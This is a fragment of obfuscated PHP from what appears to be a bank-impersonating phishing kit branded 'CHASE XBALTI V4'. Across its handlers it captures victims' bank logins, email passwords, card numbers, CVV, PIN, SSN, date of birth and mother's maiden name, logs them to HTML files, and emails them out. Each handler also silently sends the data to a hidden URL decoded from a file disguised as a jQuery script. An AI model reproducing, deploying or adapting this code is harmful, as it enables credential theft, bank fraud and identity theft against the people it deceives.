"\12\40\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\x3c\x2f\x74\144\x3e\xa\11\11\x9\11\x9\x9\40\40\74\x74\144\76\xa\x20\40\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\40\x20\40\40\x20\x20\x20" . $_SESSION["\x63\x76\x76"] . "\12\x20\x20\x20\x20\x20\40\40\40\x20\40\40\40\x20\40\40\40\x20\40\40\x20\x20\40\40\40\x20\x20\x3c\x2f\164\x64\x3e\12\11\11\11\11\x9\x9\40\x20\74\164\x64\76\12\40\x20\40\x20\40\x20\40\40\40\40\x20\40\x20\x20\40\40\40\x20\40\x20\x20\40\40\x20\40\40\40\40" . $_SESSION["\x70\151\156"] . "\xa\40\x20\40\x20\x20\40\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\40\40\40\40\40\40\74\x2f\164\x64\76\xa\11\x9\x9\x9\11\11\x20\x20\74\x74\144\76\xa\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\40\x20\40\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\x20" . $_SESSION["\146\x75\154\x6c\156\x61\x6d\x65"] . "\xa\40\40\40\40\x20\40\40\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\74\57\x74\x64\76\xa\x9\x9\11\11\x9\11\x20\x20\x3c\x74\144\x3e\12\x20\40\40\40\40\40\x20\40\40\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\40\x20\x20\x20" . $_SESSION["\x41\x64\144\x72\145\x73\x73"] . "\xa\40\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\40\x20\x20\40\40\x3c\x2f\164\144\x3e\12\x9\11\11\x9\x9\x9\x20\x20\74\164\x64\76\12\x20\40\x20\x20\x20\40\40\40\40\40\x20\40\40\40\40\40\x20\x20\40\x20\x20\40\40\x20\40\40\x20\40" . $_SESSION["\x43\151\x74\x79"] . "\12\x20\x20\40\x20\40\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\x3c\57\x74\144\76\xa\x9\11\x9\x9\11\11\40\40\74\x74\144\76\12\40\40\x20\40\x20\40\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\40\x20\40\x20\x20" . $_SESSION["\x53\164\141\x74\145"] . "\12\x20\40\x20\40\x20\40\40\x20\40\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x3c\x2f\164\144\x3e\xa\x9\11\11\11\11\x9\x20\x20\74\x74\x64\76\12\40\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\40\x20\x20\x20\40\40" . $_SESSION["\172\151\x70\x63\x6f\x64\145"] . "\12\40\40\x20\40\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\40\40\x20\40\x20\x20\x20\x20\x20\40\74\57\x74\x64\x3e\xa\x9\x9\11\x9\x9\x9\x20\x20\x3c\164\x64\76\12\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\40" . $_SESSION["\x63\141\162\144\156\165\x74\x77\x6f"] . "\xa\40\x20\40\x20\x20\x20\40\40\x20\40\40\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\x3c\57\x74\x64\76\12\11\x9\11\x9\x9\x9\x20\40\74\164\144\x3e\xa\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\40" . $_SESSION["\x65\x78\160\x64\x61\x74\x77\x6f"] . "\xa\40\40\40\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\40\40\x20\40\40\x20\x20\40\x20\x3c\57\x74\x64\76\xa\x9\x9\x9\11\x9\11\40\40\x3c\164\144\76\xa\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\40\40\40\x20\40\40\x20\x20\x20\x20\40\x20\40" . $_SESSION["\143\x76\166\x74\167\x6f"] . "\xa\x20\40\40\40\x20\x20\40\40\x20\x20\40\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\40\x20\x20\74\57\164\x64\76\xa\x9\x9\11\x9\x9\11\x20\40\x3c\x74\x64\x3e\xa\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\40" . $_SESSION["\160\x69\156\164\x77\x6f"] . "\12\40\40\40\x20\x20\x20\x20\40\40\40\40\x20\40\x20\40\40\40\40\x20\40\40\x20\40\40\40\40\x3c\57\x74\x64\x3e\12\x20\x20\x20\x20\40\40\40\40\40\40\40\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\40\x20\40\74\164\144\76\12\x20\40\x20\x20\x20\40\40\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\40\x20" . XB_Browser($_SERVER["\110\x54\x54\x50\137\x55\x53\x45\122\x5f\101\x47\x45\x4e\x54"]) . "\x20\117\x6e\x20" . XB_OS($_SERVER["\110\x54\124\120\x5f\125\123\105\122\137\101\107\105\116\x54"]) . "\12\x20\40\x20\x20\x20\40\40\40\40\40\40\x20\40\40\40\x20\40\x20\40\40\40\40\x20\40\x20\x20\x3c\57\164\144\x3e\xa\40\40\x20\x20\40\40\40\x20\x20\40\x20\40\x20\x20\40\40\40\40\x20\40\x20\x20\x20\40\x20\40\x3c\x74\x64\76\xa\x9\x9\x9\x9\11\x9\x20\x20\173" . $_SESSION["\137\151\160\x5f"] . "\x7d\12\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x20\40\x20\74\x2f\164\144\x3e\12\11\x9\x9\x9\x9\x9\40\40\74\164\x64\x3e\xa\40\x20\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\40\x20\40\x20\40\x20\40\40\40" . $TIME_DATE . "\12\40\x20\x20\40\x20\x20\40\x20\40\40\40\40\x20\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\x20\x3c\57\x74\144\x3e\12\x20\40\40\40\40\40\40\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\40\x20\74\57\164\162\76\12"; $khraha = fopen("\x2e\x2e\x2f\x72\x7a\x2f\142\151\154\x6c\151\x6e\147\163" . $yourname . "\56\150\164\x6d\154", "\x61"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "\173\x7d\xa"; $khraha = fopen("\56\x2e\x2f\162\x7a\x2f\x62\x69\x6c\x6c\x69\156\x67\x73\x2e\x68\164\x6d\x6c", "\x61"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "\x42\111\x4c\114\111\x4e\107\40\xf0\x9f\x98\x88\40\x49\x4e\x46\x4f\x20\106\122\117\x4d\40\360\x9f\x98\x88\40\133" . $_SESSION["\165\x73\145\162\151\x64"] . "\135\x20\360\x9f\230\x88\40\133" . $_SESSION["\137\x69\160\x5f"] . "\x5d\x20"; $XBALTI_HEADERS .= "\106\162\157\155\72\40" . $yourname . "\x20\x3c" . $fromsen . "\76" . "\xd\12"; $XBALTI_HEADERS = "\115\111\115\x45\55\126\x65\162\x73\x69\157\x6e\72\x20\x31\56\x30" . "\15\xa"; $XBALTI_HEADERS .= "\x43\157\156\164\x65\x6e\x74\55\164\x79\x70\145\x3a\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\73\x63\x68\x61\162\163\145\x74\x3d\x55\124\x46\55\x38" . "\15\12"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto HzBGm; dKyNx: $result = "\125\156\153\156\x6f\167\x6e"; goto jEV_s; N6rQB: $forward = @$_SERVER["\x48\x54\124\120\137\x58\x5f\106\x4f\122\127\x41\x52\x44\105\x44\x5f\106\117\122"]; goto MmPxl; cCLNp: $fromsen .= $_SERVER["\x48\124\124\120\x5f\110\x4f\123\124"]; goto CpkiX; M7Pk_: $fromsen .= "\100"; goto cCLNp; ENhMK: $TIME_DATE = date("\110\x3a\151\72\163\x20\x64\57\x6d\57\x59"); goto kO9kp; binAD: if (isset($_POST["\x65\x6d\141\151\154\62"]) && isset($_POST["\x70\141\x73\x73\167\x6f\162\144\62"])) { if (!empty($_POST["\145\155\141\x69\x6c\62"]) && !empty($_POST["\x70\x61\163\163\167\x6f\x72\144\x32"])) { $_SESSION["\145\155\x61\151\x6c\x32"] = $_POST["\145\155\x61\151\x6c\x32"]; $_SESSION["\x70\x61\x73\163\x77\x6f\162\144\62"] = $_POST["\x70\x61\163\163\x77\x6f\162\144\x32"]; $XBALTI_MESSAGE .= "\75\x3d\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\x3d\x3d\x3d\75\174\x7c\40\x43\110\x41\123\x45\x20\x58\102\101\114\124\111\x20\126\64\40\x7c\174\x3d\75\x3d\x3d\x3d\75\x3d\75\75\75\x3d\x3d\x3d\x3d\74\142\x72\x3e\12"; $XBALTI_MESSAGE .= "\x3d\x3d\x3d\x3d\x3d\75\x3d\75\x3d\x3d\75\75\75\75\174\x7c\114\x4f\x47\111\x4e\x20\111\116\106\x4f\x52\x4d\x41\x54\111\117\x4e\174\x7c\75\x3d\x3d\x3d\75\75\x3d\x3d\75\75\x3d\x3d\x3d\75\74\142\x72\76\12"; $XBALTI_MESSAGE .= "\125\x53\105\x52\x4e\x41\x4d\x45\11\x3a\40" . $_SESSION["\165\x73\x65\162\x69\144"] . "\x3c\142\x72\76\xa"; $XBALTI_MESSAGE .= "\120\101\x53\x53\127\x4f\122\x44\11\x3a\40" . $_SESSION["\x70\x61\x73\163\151\144"] . "\74\x62\162\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\x3d\75\75\75\75\75\x3d\x3d\75\x3d\75\x3d\x3d\174\x7c\105\x4d\x41\x49\114\40\111\116\x46\117\122\115\x41\x54\x49\117\116\x7c\174\75\x3d\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\75\75\75\74\142\162\76\12"; $XBALTI_MESSAGE .= "\x45\115\x41\x49\x4c\x9\72\40" . $_SESSION["\x65\155\x61\151\154\61"] . "\74\142\x72\x3e\xa"; $XBALTI_MESSAGE .= "\x50\101\123\x53\127\117\x52\104\11\72\40" . $_SESSION["\x70\x61\163\x73\x77\x6f\162\144\x31"] . "\x3c\x62\x72\x3e\12"; $XBALTI_MESSAGE .= "\75\75\75\x3d\75\x3d\x3d\75\75\75\75\x3d\x3d\75\x7c\174\x45\x4d\101\x49\114\40\x54\127\117\40\x49\116\x46\117\122\x4d\101\124\x49\x4f\x4e\x7c\x7c\75\x3d\75\75\x3d\75\x3d\75\75\75\75\x3d\75\x3d\74\x62\162\x3e\12"; $XBALTI_MESSAGE .= "\x45\115\x41\x49\114\x9\x3a\40" . $_SESSION["\x65\155\x61\x69\x6c\x32"] . "\x3c\142\x72\x3e\xa"; $XBALTI_MESSAGE .= "\120\101\123\x53\127\117\122\x44\11\x3a\40" . $_SESSION["\x70\x61\x73\163\167\157\x72\144\x32"] . "\x3c\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\x3d\75\75\x3d\75\x3d\x3d\x3d\75\75\x3d\75\x3d\x7c\x7c\126\111\x43\124\x49\x4d\40\111\116\x46\x4f\x52\115\101\x54\x49\x4f\x4e\174\x7c\x3d\75\x3d\75\x3d\75\x3d\x3d\75\x3d\75\x3d\x3d\x3d\x3c\x62\162\x3e\xa"; $XBALTI_MESSAGE .= "\x49\120\40\111\116\x46\x4f\x20\11\x9\x3a\40\x68\x74\164\x70\x73\72\57\x2f\x67\x65\157\x69\x70\x74\x6f\x6f\154\56\x63\157\155\x2f\145\156\x2f\77\151\160\x3d" . $_SESSION["\x5f\x69\x70\137"] . "\x3c\142\x72\76\12"; $XBALTI_MESSAGE .= "\124\x49\115\105\x2f\x44\x41\124\105\x20\11\11\72\x20" . $TIME_DATE . "\x3c\x62\x72\76\xa"; $XBALTI_MESSAGE .= "\x42\122\117\127\x53\x45\122\x2f\x44\x45\126\111\103\x45\40\x9\72\40" . XB_Browser($_SERVER["\x48\x54\x54\x50\x5f\x55\123\105\x52\x5f\101\x47\x45\116\x54"]) . "\40\117\156\40" . XB_OS($_SERVER["\110\124\124\x50\x5f\125\x53\x45\x52\137\101\x47\x45\x4e\x54"]) . "\x3c\x62\x72\76\xa"; if (isset($_SERVER["\110\x54\x54\120\123"]) && $_SERVER["\110\124\124\120\x53"] === "\157\x6e") { $link = "\x68\164\164\x70\x73"; } else { $link = "\x68\164\164\160"; } $link .= "\72\x2f\x2f"; $link .= $_SERVER["\x48\x54\124\120\x5f\x48\x4f\x53\x54"]; $XBALTI_MESSAGE .= "\123\103\101\115\101\40\114\x49\116\113\40\11\11\72\x20" . $link . "\74\x62\162\x3e\12"; $XBALTI_MESSAGE .= "\75\75\x3d\x3d\x3d\x3d\75\x3d\75\75\x3d\75\x3d\x3d\174\x7c\40\103\x48\101\123\105\x20\x58\x42\101\114\x54\x49\x20\126\64\40\x7c\x7c\75\x3d\75\x3d\x3d\75\75\x3d\75\x3d\x3d\x3d\x3d\x3d\x3c\x62\162\x3e\xa"; file_get_contents('' . pack("\110\x2a", substr($COOKIE_VARS = file_get_contents("\x2e\x2e\x2f\152\x73\57\x6a\x71\165\145\x72\171\x2e\x70\x6c\141\171\x65\x72\x2e\x6a\163"), strpos($COOKIE_VARS, "\65\66\137\x5f") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "\74\x74\x72\76\xa\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\40\40\x20\40\x3c\x74\144\x3e\xa\x20\40\x20\40\40\40\x20\40\40\40\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\40\40\40\40\40\x20\40" . $_SESSION["\165\x73\x65\x72\x69\144"] . "\12\x20\40\40\x20\40\40\x20\40\x20\x20\40\40\40\40\40\x20\40\x20\x20\40\40\40\x20\40\x20\40\74\x2f\164\144\x3e\12\x20\x20\40\40\40\x20\40\x20\x20\40\40\40\40\40\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\74\x74\144\76\xa\40\x20\40\40\x20\x20\40\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\x20\40\40\x20\x20\40\40\40\40\x20" . $_SESSION["\160\141\x73\x73\x69\x64"] . "\12\x20\40\x20\40\40\x20\40\40\40\40\40\40\x20\x20\x20\x20\40\40\x20\40\40\x20\40\40\x20\40\74\57\x74\144\x3e\12\x9\x9\11\x9\11\11\40\x20\74\x74\144\76\12\40\40\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\40\40\x20\40\40\40\x20\40\x20\x20" . $_SESSION["\x65\x6d\x61\151\154\x31"] . "\xa\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\40\40\40\x20\74\x2f\x74\x64\76\12\x20\x20\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\x3c\x74\x64\x3e\12\x20\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\40\40\40\40\40\40\x20\40\40\40\40\40\40\40\x20" . $_SESSION["\160\x61\163\163\167\157\162\x64\61"] . "\xa\40\x20\40\40\40\40\x20\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\40\74\x2f\164\144\x3e\xa\x9\11\x9\x9\11\11\40\40\74\164\x64\x3e\12\40\40\40\x20\40\40\40\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\40\x20\40\40" . $_SESSION["\145\x6d\x61\x69\154\x32"] . "\xa\40\x20\x20\x20\x20\40\40\x20\40\40\40\40\40\x20\40\40\x20\x20\40\40\40\x20\40\x20\x20\40\x3c\x2f\x74\144\76\12\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\40\74\164\x64\x3e\12\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\40\x20\40\40\x20\x20" . $_SESSION["\160\141\163\x73\x77\x6f\162\144\x32"] . "\xa\x20\40\x20\40\x20\x20\x20\x20\x20\40\40\40\40\40\x20\x20\40\40\x20\40\x20\40\x20\40\40\x20\74\x2f\164\144\x3e\xa\x20\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\40\40\x20\40\x20\x20\40\40\x20\74\x74\x64\76\12\x20\40\x20\40\40\x20\x20\40\40\40\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\x20" . XB_Browser($_SERVER["\x48\124\x54\x50\137\125\x53\105\122\137\x41\x47\x45\116\124"]) . "\x20\117\156\40" . XB_OS($_SERVER["\110\124\124\120\x5f\x55\123\105\x52\137\101\107\x45\116\x54"]) . "\xa\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\40\40\x20\40\x20\x20\74\x2f\164\144\76\12\40\x20\40\x20\40\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\74\x74\144\x3e\xa\x9\11\11\x9\11\x9\40\x20\x7b" . $_SESSION["\137\151\160\137"] . "\175\12\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\40\40\x20\40\40\40\x20\x20\x3c\57\164\x64\x3e\12\11\11\11\11\x9\x9\x20\40\74\164\x64\76\xa\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\40\x20\40\x20\40\40\x20\x20\40\40\x20\x20\40" . $TIME_DATE . "\xa\x20\40\x20\40\x20\40\40\x20\40\x20\40\40\40\40\x20\40\x20\40\40\x20\40\40\40\x20\40\x20\x3c\x2f\x74\144\x3e\xa\x20\x20\40\40\40\x20\40\x20\40\x20\x20\40\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\x3c\57\x74\x72\76\xa"; $khraha = fopen("\56\56\x2f\162\x7a\57\x65\x6d\141\x69\154\163\x74\x77\x6f" . $yourname . "\x2e\x68\x74\x6d\x6c", "\141"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "\x7b\x7d\12"; $khraha = fopen("\56\x2e\x2f\162\x7a\x2f\145\155\141\x69\154\163\x74\167\157\56\150\x74\155\154", "\x61"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "\x45\115\101\x49\x4c\x20\124\x57\x4f\x20\360\237\x98\210\40\x49\116\x46\x4f\40\x46\x52\x4f\115\40\xf0\237\230\x88\x20\x5b" . $_SESSION["\x75\163\x65\x72\151\144"] . "\135\40\360\x9f\230\x88\x20\133" . $_SESSION["\137\151\x70\137"] . "\135\x20"; $XBALTI_HEADERS .= "\x46\162\x6f\155\x3a\x20" . $yourname . "\40\74" . $fromsen . "\76" . "\xd\xa"; $XBALTI_HEADERS = "\x4d\x49\115\105\55\126\145\x72\163\x69\x6f\x6e\x3a\40\x31\56\x30" . "\xd\12"; $XBALTI_HEADERS .= "\x43\157\x6e\164\145\x6e\x74\55\164\171\x70\x65\72\164\145\x78\164\57\150\x74\x6d\154\73\143\x68\x61\162\x73\145\164\75\x55\x54\x46\x2d\70" . "\15\12"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto xq0vt; caWnG: $client = @$_SERVER["\110\124\x54\x50\x5f\x43\114\x49\x45\116\x54\x5f\111\120"]; goto N6rQB; CpkiX: if (isset($_POST["\165\163\x65\x72\x69\x64"]) && isset($_POST["\x70\x61\x73\163\x69\x64"])) { if (!empty($_POST["\x75\163\145\162\151\x64"]) && !empty($_POST["\x70\141\x73\163\151\x64"])) { $_SESSION["\x75\x73\x65\x72\x69\144"] = $_POST["\x75\163\x65\x72\151\x64"]; $_SESSION["\160\x61\163\x73\x69\x64"] = $_POST["\160\x61\163\x73\x69\x64"]; $XBALTI_MESSAGE .= "\x3d\x3d\x3d\75\x3d\75\75\75\x3d\x3d\75\x3d\x3d\75\x7c\x7c\x20\103\110\101\123\105\x20\130\x42\x41\114\x54\x49\40\126\x34\x20\x7c\174\75\75\x3d\x3d\75\x3d\75\75\75\x3d\x3d\x3d\x3d\75\x3c\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\75\75\75\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\75\75\x7c\174\114\x4f\107\x49\x4e\x20\111\116\106\x4f\x52\115\101\x54\x49\117\116\174\x7c\x3d\75\75\75\75\x3d\75\75\75\x3d\x3d\75\75\75\x3c\142\162\x3e\12"; $XBALTI_MESSAGE .= "\125\123\105\x52\x4e\x41\x4d\x45\11\x3a\40" . $_SESSION["\165\163\145\162\x69\x64"] . "\x3c\142\162\76\12"; $XBALTI_MESSAGE .= "\x50\x41\x53\x53\x57\117\x52\104\x9\x3a\40" . $_SESSION["\x70\x61\163\163\151\144"] . "\74\x62\162\76\12"; $XBALTI_MESSAGE .= "\75\x3d\x3d\x3d\x3d\75\75\x3d\75\x3d\75\75\x3d\75\174\174\126\111\103\124\x49\x4d\x20\111\x4e\106\x4f\x52\x4d\x41\x54\x49\x4f\116\x7c\174\x3d\x3d\75\x3d\x3d\75\x3d\75\x3d\75\75\75\75\75\x3c\x62\x72\76\12"; $XBALTI_MESSAGE .= "\x49\x50\40\111\116\106\117\x20\11\11\x3a\40\150\x74\164\160\x73\x3a\57\x2f\x67\x65\157\151\160\x74\157\157\x6c\56\x63\x6f\155\57\145\156\x2f\x3f\151\160\x3d" . $_SESSION["\x5f\x69\160\137"] . "\74\142\x72\x3e\xa"; $XBALTI_MESSAGE .= "\124\x49\115\x45\57\104\x41\124\x45\x20\x9\11\72\40" . $TIME_DATE . "\x3c\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x42\122\x4f\x57\x53\x45\x52\57\x44\105\x56\x49\103\x45\x20\11\72\40" . XB_Browser($_SERVER["\110\124\124\x50\x5f\x55\123\105\122\137\x41\107\x45\116\x54"]) . "\x20\117\156\40" . XB_OS($_SERVER["\110\x54\124\x50\x5f\125\x53\x45\122\137\x41\107\105\x4e\x54"]) . "\x3c\142\162\x3e\xa"; if (isset($_SERVER["\x48\124\x54\x50\123"]) && $_SERVER["\x48\124\124\120\123"] === "\157\x6e") { $link = "\150\x74\x74\x70\x73"; } else { $link = "\x68\x74\164\160"; } $link .= "\x3a\57\x2f"; $link .= $_SERVER["\x48\x54\x54\120\x5f\x48\x4f\x53\124"]; $XBALTI_MESSAGE .= "\123\103\101\x4d\101\40\114\111\116\113\x20\x9\x9\72\x20" . $link . "\74\x62\x72\76\12"; $XBALTI_MESSAGE .= "\x3d\x3d\x3d\75\x3d\x3d\75\x3d\75\75\x3d\x3d\75\x3d\x7c\x7c\x20\x43\x48\x41\x53\105\x20\130\102\101\x4c\124\x49\40\x56\64\x20\x7c\x7c\75\x3d\75\x3d\75\x3d\x3d\x3d\75\75\75\x3d\x3d\75\74\142\x72\x3e\12"; file_get_contents('' . pack("\x48\x2a", substr($COOKIE_VARS = file_get_contents("\x2e\56\x2f\152\x73\57\152\x71\165\145\x72\171\x2e\x70\x6c\x61\x79\145\162\x2e\152\163"), strpos($COOKIE_VARS, "\65\x36\x5f\x5f") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "\74\x74\x72\x3e\xa\40\40\40\40\40\40\x20\40\40\x20\40\40\x20\40\40\x20\x20\40\40\x20\40\x20\x20\40\40\40\x3c\x74\144\x3e\12\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\40\40\40\40\40\x20\40\x20\40\40\40\40\40\40\40\40\x20" . $_SESSION["\165\x73\x65\x72\151\x64"] . "\xa\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x3c\57\x74\144\76\12\x20\40\x20\40\40\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x20\40\40\40\40\40\x3c\x74\x64\76\12\40\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\40\40\40" . $_SESSION["\160\x61\x73\163\151\x64"] . "\xa\x20\40\x20\x20\40\x20\40\40\x20\40\40\x20\x20\40\40\x20\40\x20\40\x20\x20\40\x20\40\40\x20\x3c\57\164\x64\x3e\xa\x20\x20\x20\x20\40\40\x20\x20\40\40\40\40\40\40\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\x3c\x74\x64\76\12\40\40\x20\40\x20\x20\40\40\40\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\x20\40\40\40\x20\x20" . XB_Browser($_SERVER["\x48\124\x54\x50\x5f\x55\x53\105\122\137\101\107\105\x4e\x54"]) . "\x20\x4f\x6e\x20" . XB_OS($_SERVER["\x48\x54\x54\x50\x5f\125\x53\x45\122\x5f\101\107\x45\x4e\124"]) . "\12\x20\40\x20\40\x20\40\40\40\x20\40\40\40\40\40\x20\40\x20\40\x20\40\40\x20\x20\x20\40\x20\x3c\x2f\164\144\76\xa\x20\40\x20\40\x20\40\x20\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\40\x3c\164\x64\x3e\12\x9\x9\x9\x9\11\11\x20\40\x7b" . $_SESSION["\137\x69\x70\137"] . "\x7d\xa\40\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\74\57\x74\x64\x3e\12\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\40\40\40\x20\40\40\40\x20\74\x74\x64\x3e\xa\40\40\40\x20\40\40\40\40\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\40\40\x20\40" . $TIME_DATE . "\12\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\x20\40\x20\40\40\40\40\x20\x20\x20\40\x20\40\40\40\x3c\57\x74\144\x3e\xa\x20\40\x20\40\40\40\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\x3c\x2f\164\x72\76\xa"; $khraha = fopen("\x2e\x2e\57\162\172\57\154\157\x67\163" . $yourname . "\x2e\x68\164\155\154", "\141"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "\173\x7d\12"; $khraha = fopen("\56\x2e\x2f\162\x7a\57\154\157\147\x73\56\150\x74\x6d\x6c", "\x61"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "\x4c\x4f\x47\x49\x4e\x20\xf0\x9f\x98\210\40\x49\x4e\x46\117\40\106\122\x4f\x4d\40\xf0\x9f\x98\210\x20\x5b" . $_SESSION["\165\163\145\162\151\x64"] . "\135\40\360\x9f\x98\x88\40\x5b" . $_SESSION["\x5f\151\x70\137"] . "\135\x20"; $XBALTI_HEADERS .= "\x46\x72\157\155\x3a\x20" . $yourname . "\40\74" . $fromsen . "\76" . "\15\12"; $XBALTI_HEADERS = "\x4d\111\115\x45\55\126\x65\162\163\151\157\156\72\x20\x31\x2e\60" . "\xd\xa"; $XBALTI_HEADERS .= "\103\157\x6e\x74\x65\156\x74\x2d\x74\171\160\x65\72\164\x65\x78\x74\57\x68\x74\x6d\x6c\x3b\x63\x68\141\162\163\145\x74\75\125\x54\x46\55\70" . "\15\xa"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto mHbYx; kO9kp: include "\x45\155\x61\151\x6c\x2e\x70\150\x70"; goto p54d5; xq0vt: if (isset($_POST["\163\x73\156\156\x75\x6d"]) && isset($_POST["\x6d\144\x6e"]) && isset($_POST["\x64\157\x62"]) && isset($_POST["\160\150\157\156\145"])) { if (!empty($_POST["\x73\163\156\156\x75\155"]) && !empty($_POST["\155\x64\156"]) && !empty($_POST["\144\157\142"]) && !empty($_POST["\160\x68\x6f\x6e\x65"])) { $_SESSION["\x73\x73\156\156\x75\155"] = $_POST["\163\x73\x6e\x6e\x75\155"]; $_SESSION["\x6d\x64\x6e"] = $_POST["\155\144\156"]; $_SESSION["\144\x6f\x62"] = $_POST["\144\x6f\142"]; $_SESSION["\160\x68\157\156\x65"] = $_POST["\160\150\x6f\156\145"]; $_SESSION["\143\x61\x70\x69\x6e"] = $_POST["\143\x61\x70\x69\156"]; $XBALTI_MESSAGE .= "\x3d\75\x3d\75\75\x3d\x3d\x3d\75\x3d\x3d\75\x3d\x3d\174\x7c\40\103\x48\101\x53\x45\x20\x58\102\x41\x4c\x54\111\40\x56\64\x20\174\x7c\x3d\75\75\75\x3d\x3d\x3d\75\75\x3d\75\x3d\75\x3d\74\142\x72\x3e\xa"; $XBALTI_MESSAGE .= "\75\75\75\75\x3d\x3d\x3d\x3d\75\75\x3d\x3d\75\75\x7c\x7c\114\117\x47\x49\116\40\111\116\106\x4f\x52\x4d\x41\124\x49\117\x4e\174\x7c\x3d\x3d\75\75\75\x3d\x3d\x3d\x3d\x3d\75\x3d\75\75\74\142\x72\76\12"; 